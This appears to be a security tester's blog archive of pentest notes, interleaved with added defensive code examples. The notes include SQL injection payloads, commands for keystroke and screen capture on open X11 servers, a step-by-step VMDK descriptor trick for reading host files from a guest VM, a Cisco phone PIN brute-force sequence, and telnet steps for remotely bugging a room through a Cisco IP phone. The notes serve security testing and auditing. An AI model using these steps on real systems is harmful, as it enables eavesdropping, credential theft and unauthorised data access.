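

if __name__ == "__main__":
    for failure in run_security_test(make_db(), ["alice", "' OR 1=1 --", "'", "' OR '1'='1"]):
        print("FAILED:", failure)
```

Two of the four payloads are caught, for different reasons, and one classic payload (`' OR '1'='1`) slips through because AND binds tighter than OR in the concatenated query: a reminder that the assertion is only as good as the payload list and the fault handling around it.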
        Running the test


        Inspecting the results
      16 Dec 2013

Acquiring memory with Dumpit

      http://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216

      13 Nov 2013

Headless intercepting proxy

Here are the usable options I know of to intercept HTTP traffic when all you have is an isolated Kali Linux (accessed via SSH, with no X/VNC option and no Internet access). mitmproxy is the simplest: for example, capture in scrolling mode with mitmdump while saving the HTTP flows to a file, then review the flow details in mitmproxy's full-screen interface:
      # mitmdump -w /var/log/mitmdump-$$.log -v -p 8080
      192.168.2.109 GET http://www.jourzero.com/
          Host: www.jourzero.com
          User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          DNT: 1
          Connection: keep-alive
          If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
          If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

       << 304 Not Modified 0B

          Expires: Wed, 13 Nov 2013 17:30:43 GMT
          Date: Wed, 13 Nov 2013 17:30:43 GMT
          Cache-Control: private, max-age=0
          ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
          Server: GSE

      # mitmproxy -r /var/log/mitmdump-3099.log
      >> GET http://www.jourzero.com/
      ← 304 [empty content]
(press ENTER)

      2013-11-13 12:30:43 GET http://www.jourzero.com/
      ← 304 [empty content]
      Request                                   Response
      Host: www.jourzero.com
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
      If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      2013-11-13 12:30:43 GET http://www.jourzero.com/
                              ← 304 [empty content]
(press TAB)
      Request                                  Response
      Expires:        Wed, 13 Nov 2013 17:30:43 GMT
      Date:           Wed, 13 Nov 2013 17:30:43 GMT
      Cache-Control:  private, max-age=0 
      ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      Server:         GSE
                  


These other options also offer a headless mode but are not as simple to use:
• Zed Attack Proxy with the "-daemon" option: zap.sh -daemon. In my experience you need to know how to edit the proxy's XML configuration files to get what you want. Not the most attractive option.
• Burp with the -Djava.awt.headless=true option. Scripts that use this option: sodapop.sh and bscan.
• ProxyStrike with the -c (console) option; not sure whether this option is really usable...
• Metasploit socks4a auxiliary server (note that this is a SOCKS relay: it forwards connections through Metasploit's routing but does not let you view or modify the HTTP traffic):
      msf > use auxiliary/server/socks4a
      msf auxiliary(socks4a) > info

      Name: Socks4a Proxy Server
      Module: auxiliary/server/socks4a
      Version: 0
      License: Metasploit Framework License (BSD)
      Rank: Normal

      Provided by:
      sf

      Basic options:
      Name Current Setting Required Description
      ---- --------------- -------- -----------
      SRVHOST 0.0.0.0 yes The address to listen on
      SRVPORT 1080 yes The port to listen on.

      Description:
      This module provides a socks4a proxy server that uses the builtin
      Metasploit routing to relay connections.

      msf auxiliary(socks4a) > run
      [*] Auxiliary module execution completed

      [*] Starting the socks4a proxy server
      msf auxiliary(socks4a) > jobs

      Jobs
      ====

      Id Name
      -- ----
      0 Auxiliary: server/socks4a
       
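What `mitmdump -w` does on a box with no GUI is record each flow so it can be reviewed later. The following is an added example, not code from the post and not mitmproxy's own code: a minimal plain-HTTP forward proxy in the standard library that records every request/response pair, plus a constructed origin server and a run_demo() that sends one request through the proxy on loopback. It is a demonstration of the recording behaviour only (no TLS interception, no body rewriting); the URL and the "hello" body are constructed.

```python
import http.client
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer, ThreadingHTTPServer
from urllib.parse import urlsplit

# Hop-by-hop headers are never forwarded by a proxy (RFC 7230 section 6.1).
HOP_BY_HOP = {"connection", "keep-alive", "proxy-connection", "proxy-authorization",
              "te", "trailer", "transfer-encoding", "upgrade"}


class RecordingProxy(BaseHTTPRequestHandler):
    """Forward proxy that records every flow, the way `mitmdump -w` does.
    Flows are kept in memory; save_flows() writes them as JSON lines for later review."""
    protocol_version = "HTTP/1.1"
    flows = []
    lock = threading.Lock()

    def do_GET(self):
        self.relay()

    def do_POST(self):
        self.relay()

    def relay(self):
        url = urlsplit(self.path)  # a proxy receives the absolute URL in the request line
        if not url.netloc:
            self.send_error(400, "proxy requests must use an absolute URL")
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))) or None
        req_headers = {k: v for k, v in self.headers.items() if k.lower() not in HOP_BY_HOP}
        target = (url.path or "/") + ("?" + url.query if url.query else "")
        conn = http.client.HTTPConnection(url.hostname, url.port or 80, timeout=5)
        conn.request(self.command, target, body, req_headers)
        resp = conn.getresponse()
        resp_body = resp.read()
        resp_headers = [(k, v) for k, v in resp.getheaders()
                        if k.lower() not in HOP_BY_HOP and k.lower() != "content-length"]
        conn.close()
        with self.lock:
            self.flows.append({"client": self.client_address[0], "method": self.command,
                               "url": self.path, "request_headers": req_headers,
                               "status": resp.status, "response_headers": dict(resp_headers),
                               "response_length": len(resp_body)})
        self.send_response_only(resp.status, resp.reason)
        for k, v in resp_headers:
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(resp_body)))
        self.send_header("Connection", "close")
        self.end_headers()
        self.wfile.write(resp_body)

    def log_message(self, *args):
        pass  # the flow list is the record; keep the console quiet


def save_flows(path):
    """Persist the recorded flows as JSON lines (the headless equivalent of the -w file)."""
    with open(path, "w") as f:
        for flow in RecordingProxy.flows:
            f.write(json.dumps(flow) + "\n")


class TargetApp(BaseHTTPRequestHandler):
    """Constructed origin server standing in for the site under test."""
    def do_GET(self):
        data = b"hello from the target"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass


def run_demo():
    """Start target and proxy on loopback, send one request through the proxy, return (body, flows)."""
    target = HTTPServer(("127.0.0.1", 0), TargetApp)
    proxy = ThreadingHTTPServer(("127.0.0.1", 0), RecordingProxy)
    for srv in (target, proxy):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        opener = urllib.request.build_opener(
            urllib.request.ProxyHandler({"http": "http://127.0.0.1:%d" % proxy.server_port}))
        with opener.open("http://127.0.0.1:%d/login?user=admin" % target.server_port, timeout=5) as r:
            body = r.read()
        return body, list(RecordingProxy.flows)
    finally:
        proxy.shutdown()
        target.shutdown()


if __name__ == "__main__":
    body, flows = run_demo()
    for f in flows:
        print(f["method"], f["url"], "->", f["status"], f["response_length"], "bytes")
```

Point a client at the proxy port with http_proxy set, let it run, then read the JSON lines back on the PC; for HTTPS you still need a tool that terminates TLS with its own CA, which is the part mitmproxy adds on top of this.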

      12 Nov 2013

Scanning sites protected against CSRF attacks

To allow scanning of sites protected against Cross-Site Request Forgery (CSRF), a Burp plugin was developed as a proof of concept. It can be found at http://code.google.com/p/pysqlin/downloads/list.

      Tiré d'un article sur http://edge-security.blogspot.ca:
      In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each requests contains a new generated anti-CSRF token needed for the next request, forming a token chain.

      A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).

      Original post origin: http://edge-security.blogspot.ca.

      25 Jul 2013

      Keeping HTML line breaks when importing into Excel (without an extra row)

      Here is a common problem: you want to import an HTML table into Excel without Excel interpreting the <BR> line-break tags as a change of row, which makes the sort and filter functions unusable. In my opinion, the lack of any flexibility in this respect from Excel's user interface is a bug!

      The simplest solution is to add a Microsoft-specific style (in the HTML file) as follows:

      <html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

      Thanks to Michu (24/7 dev & coffee blog) for the tip!

      Ref: Generating Excel files from web - line breaks in cells 

      Thanks to Michu for the great tip... Initial text copied here for convenience...

      Generating Excel files from web - line breaks in cells

      ...I needed to wrap text in cell, but when I put tag into HTML output, Excel interpreted it as a new row, not a line-break in existing cell. The solution I found is to add into a stylesheet:
          br {mso-data-placement:same-cell;}

      11 Jan 2013

      Attacking an X11 server without authentication (after xhost +)

      Here are a few commands to exploit an open X11 server:

      Remote key capture
      $ xkey IP:0.0

      NB:
      • The source code for xkey.c can be found here
      • Use 0.0 for port 6000, 1.0 for port 6001...
       
      Screen capture:
      $ xwd -display IP:0.0 -root -silent -out /tmp/screendump
      $ xv /tmp/screendump 
      $ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


      References:

      2 Dec 2012

      Analysis of Android app traffic through Burp Suite

      Good summary here

      23 Nov 2012

      Forcing Firefox to remember passwords

      The Firefox configuration setting wallet.crypto.autocompleteoverride allows the override of autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

      Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

      As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

      Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base

      22 Oct 2012

      Stealing host data from a VMware vSphere 5.0 VM

      This post is inspired by the Insinuator site's presentation on an attack on public IaaS clouds (+ follow-up post) that support VM uploads and that are based on VMware ESXi 5.0. Essentially, it's about a VM guest being able to read files on the ESXi host after abusing a VMDK descriptor file's content.

      I wanted to check if this is really a problem (i.e. the whole attack path being valid) or if this post was just something half-baked or simply "food for thought".

      Reproducing this in my own environment 

      Here, I'll try to reproduce what the above post did while checking that this is really a problem with VMware. I mean, this will only be a problem if exporting/importing the VM to/from OVF format works. In other words, if VMware performs clean-up/validation while deploying OVF files, this alleged vulnerability may be irrelevant.

      Test Environment: ESXi 5.0.0 #1 SMP Release build-474610 Aug 26 2011 13:51:17 x86_64

      Step 1: Simulate the stealing of the host's volume details from a Debian guest

      On ESXi host:
      • Connect to ESXi server using VMware vSphere Client 5.0
      • Create a small Debian 6.0.3 Server VM
      • SSH to the ESXi hypervisor (the SSH server has to be turned on).
      Here we will work on the host's files directly instead of exporting them to a different format (i.e. OVF, OVA...) and then reimporting them.
      • Edit the resulting vmdk descriptor file (on the ESXi host directly). Added line (the second extent, which points at /bootbank/state.tgz on the host):
      /vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
      # Disk DescriptorFile
      version=1
      encoding="UTF-8"
      CID=f7fc44b3
      parentCID=ffffffff
      isNativeSnapshot="no"
      createType="vmfs"

      # Extent description
      RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
      RW 32 VMFS "/bootbank/state.tgz"[...]
      • Back in vSphere client, start the Debian VM
      • SSH to VM or use the vSphere Client to get into the VM's console
      • Multiply the size of the VMFS extent above (in sectors) by the 512-byte sector size: 2097152 * 512 = 1073741824 (OFFSET)

      • Create a new loopback device that starts right after the flat VMDK, i.e. at the added extent: losetup -v -o OFFSET -f /dev/sda 
      • Use the loopback device to extract the data: tar -x -i --ignore-command-error --ignore-failed-read -z -f /dev/loop0 
      • Extract the files in the gzip package: tar -x -i --ignore-command-error --ignore-failed-read -z -f local.tgz [screenshot of above steps]
      • Examine the content of the extracted data. Get the device file name from etc/vmware/esx.conf (naa...) [screenshot]
      Good! We can get host volume details from a guest!

      Step 2: Simulate the stealing of a host's volume content from a Debian guest
      • In the host's console session, change the vmdk descriptor file as follows (added line: the VMFSRAW extent pointing at the device found in esx.conf), taking into consideration the volume details obtained before:
      /vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
      # Disk DescriptorFile
      version=1
      encoding="UTF-8"
      CID=f7fc44b3
      parentCID=ffffffff
      isNativeSnapshot="no"
      createType="vmfs"

      # Extent description
      RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
      RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
      [...]
      • Restart the VM and reestablish a shell session to it
      • View the data of the volume [screenshot]

      NB: Although the above steps successfully demonstrated how a guest could abuse access to data on the host, I could not reproduce the same thing by creating a portable OVF package that could be deployed to the host from a remote vSphere client (simulating a malicious IaaS customer).

      However, my testing wasn't exhaustive. I didn't try to craft an OVF package taking the above into consideration. Somehow, I can't imagine that the deployment of such a package (with an absolute path pointing to a known host file/device) would work. Perhaps I should have thought of that before I started all this testing!

      Nevertheless, it's not completely impossible that a cloud provider would use a different portable format that would allow this attack vector to work.
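      As an added defensive check (not from the original post, the Insinuator article or VMware), the following Python audits the extent lines of a VMDK descriptor like the ones shown above and flags any extent that reaches outside the VM's own directory: an absolute path such as /bootbank/state.tgz, a VMFSRAW/VMFSRDM device mapping, or a .. traversal. The extent-line layout is assumed from the descriptor lines in this post, and the sample descriptor is constructed from them with both modified extents present at once.

```python
import re
from dataclasses import dataclass
from typing import List

# Extent lines in a VMDK descriptor: <access> <sectors> <type> "<filename>" [<offset>]
EXTENT_RE = re.compile(
    r'^(?P<access>RW|RDONLY|NOACCESS)\s+(?P<sectors>\d+)\s+(?P<etype>[A-Z]+)'
    r'\s+"(?P<fname>[^"]*)"(?:\s+(?P<offset>\d+))?\s*$'
)
RAW_TYPES = {"VMFSRAW", "VMFSRDM"}  # extent types that map a device, not a file


@dataclass(frozen=True)
class Finding:
    line_no: int
    extent: str
    reason: str


def audit_vmdk_descriptor(text: str) -> List[Finding]:
    """Return extents that reach outside the VM's own directory (host file or raw device)."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = EXTENT_RE.match(line)
        if not m:
            continue  # comments, blank lines and key=value settings are not extents
        etype, fname = m.group("etype"), m.group("fname")
        if etype in RAW_TYPES or fname.startswith("/dev/"):
            findings.append(Finding(line_no, line, "raw device mapping"))
        elif fname.startswith(("/", "\\")):
            findings.append(Finding(line_no, line, "absolute path outside the VM directory"))
        elif ".." in fname.replace("\\", "/").split("/"):
            findings.append(Finding(line_no, line, "parent-directory traversal in extent path"))
    return findings


# Constructed sample: the post's descriptor with both modified extents present at once.
SAMPLE_DESCRIPTOR = """\
# Disk DescriptorFile
version=1
encoding="UTF-8"
createType="vmfs"

# Extent description
RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
RW 32 VMFS "/bootbank/state.tgz"
RW 8386560 VMFSRAW "/dev/disks/naa.600508b1001c1bd269ddc2f549010bad:2"
"""
```

      Run against SAMPLE_DESCRIPTOR it reports the /bootbank/state.tgz extent as an absolute host path and the naa... extent as a raw device mapping, while the regular -flat.vmdk extent passes.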

      19 Oct 2012

      Web credential stealing (even HTTPS) via Windows event traces

      Mark Bagget found a method to extract web session details (even those using SSL), including the username and password, by enabling Event Tracing for Windows (EVT). Details are on the PaulDotCom wiki. This method has certain prerequisites (WinInet API).
      Mark Bagget was able to extract web session details (including user credentials using SSL) by turning on some event tracing on a Windows target (i.e. post exploitation tool). This is described on the PaulDotCom show notes at Episode300 - PaulDotCom Security Weekly. NB: this method has prerequisites (WinInet API usage).

      16 Oct 2012

      Montreal Java User Group

      The Montréal Java User Group (JUG) is a group of Java users that meets regularly to exchange ideas and discuss technological advances in the Java platform.

      14 Oct 2012

      Cisco IP Telephony security auditing ideas

      Here are some ideas for security auditing a Cisco IP Telephony solution.

      Password Auditing

      Web UI

      Use Burp to send POST requests (for all users) to the Cisco Call Manager login form at https://.../ccmuser/showHome.do

      IP phone PIN 

      The programmatic approach to test for Phone PIN would use an approach as described here: http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

      NB: I haven't done that test automatically, to avoid problems (in Prod), but I think the clean sequence required looks like this:
      • Get SIDVAL: /ccmpd/pdCheckLogin.do?name=undefined 
      • Try logging in -- if we get XML w/o error, we're good; set pin value to your Org's default: /ccmpd/login.do?sid=SIDVAL&userid=USERID&pin=PIN
      • Initiate logout: /ccmpd/pdLogoutPage.do?sid=SIDVAL
      • Confirm logout and close session: /ccmpd/logout.do?sid=SIDVAL
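      As an added detection-side example (not part of these notes or of Cisco's tooling), the login sequence above leaves a trail of /ccmpd/login.do requests with a changing pin value from a single source. The Python below counts distinct PIN values per (source IP, userid) over constructed Apache-style access log lines and flags targets above a threshold; the log layout is an assumption (the real Call Manager web log format was not checked), and the GET-with-query form of the request is taken from the URIs listed above.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qs, urlparse

# Assumed Apache-style access log line (the real CUCM log layout may differ).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/ccmpd/login.do"

# Constructed sample: 10.0.0.9 cycles PINs for user 1001; 10.0.0.7 logs in once normally.
SAMPLE_LOG = """\
10.0.0.9 - - [14/Oct/2012:09:00:00 -0400] "GET /ccmpd/pdCheckLogin.do?name=undefined HTTP/1.1" 200 412
10.0.0.9 - - [14/Oct/2012:09:00:01 -0400] "GET /ccmpd/login.do?sid=S1&userid=1001&pin=12345 HTTP/1.1" 200 320
10.0.0.9 - - [14/Oct/2012:09:00:02 -0400] "GET /ccmpd/login.do?sid=S1&userid=1001&pin=00000 HTTP/1.1" 200 320
10.0.0.9 - - [14/Oct/2012:09:00:03 -0400] "GET /ccmpd/login.do?sid=S1&userid=1001&pin=11111 HTTP/1.1" 200 320
10.0.0.9 - - [14/Oct/2012:09:00:04 -0400] "GET /ccmpd/login.do?sid=S1&userid=1001&pin=12345 HTTP/1.1" 200 320
10.0.0.9 - - [14/Oct/2012:09:00:05 -0400] "GET /ccmpd/login.do?sid=S1&userid=1001&pin=54321 HTTP/1.1" 200 320
10.0.0.9 - - [14/Oct/2012:09:00:06 -0400] "GET /ccmpd/pdLogoutPage.do?sid=S1 HTTP/1.1" 200 200
10.0.0.7 - - [14/Oct/2012:09:01:00 -0400] "GET /ccmpd/login.do?sid=S2&userid=1002&pin=24680 HTTP/1.1" 200 320
"""


def distinct_pins_per_target(log: str) -> Dict[Tuple[str, str], Set[str]]:
    """Map (source IP, userid) -> set of distinct PIN values submitted to login.do."""
    seen: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("uri"))
        if url.path != LOGIN_PATH:
            continue  # pdCheckLogin.do, logout pages etc. are not PIN submissions
        q = parse_qs(url.query)
        if "pin" not in q:
            continue
        userid = q.get("userid", ["<none>"])[0]
        seen[(m.group("src"), userid)].add(q["pin"][0])
    return seen


def flag_pin_guessing(log: str, threshold: int = 3) -> List[Tuple[str, str, int]]:
    """Return (src, userid, distinct_pin_count) for every target at or above the threshold."""
    return sorted(
        (src, uid, len(pins))
        for (src, uid), pins in distinct_pins_per_target(log).items()
        if len(pins) >= threshold
    )
```

      Counting distinct PINs rather than raw requests keeps a user who retries the same wrong PIN from looking like a guessing run.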

       

      Test other URIs used by Cisco IP phone

      • http://.../ccmcip/xmldirectory.jsp 
      • http://.../ccmcip/getservicesmenu.jsp 
      • http://.../ccmcip/GetTelecasterHelpText.jsp 
      • http://.../ccmcip/authenticate.jsp

      Check if IP Phones can be used to remotely bug a (conference) room 

      Another test idea is to see if listening in on remote conversations is possible because of unchanged defaults. This is described at http://dorkbyte.com/2010/10/31/cisco-ip-phones-lets-you-remotely-bug-a-room/

      Excerpt from the above reference (in case the post disappears):
      There exists an interesting “feature” in Cisco IP phones that allows a crafty user to remotely control a Cisco IP phone and set it to call a remote number (if setup to do so) and allow audio to stream normally — in effect allowing someone to remotely audio bug a room. In all fairness, this feature requires the controlling user to know the configured password for the phone which many installations leave the default password of “cisco” set.

      To try this out:
      1. Telnet to the phone (e.g. “telnet 192.0.2.10”). You may need to bridge your PC to the IP Phone VLAN from within the office (see http://www.linuxjournal.com/article/10821?page=0,2, use VLAN as determined from an IP phone's settings - eg: VLAN 161, IP: 172.16.2.241/255.255.255.127, DHCP server: 172.16.29.10, Host Name: SEPD0C282439930)
      2. Enter the password for the phone. At the “SIP Phone>” prompt: Start a “test” session with “test open”
      3. Virtually take the phone off the hook with “test offhook”
      4. Virtually dial the telephone number where the audio stream should go with “test key ” (e.g. “test key 14155556666”) 
      5. The phone will start to make the call… Switch to speakerphone with “test key spkr” (to virtually push the Speakerphone key) 
      6. Listen to the audio streaming from the phone…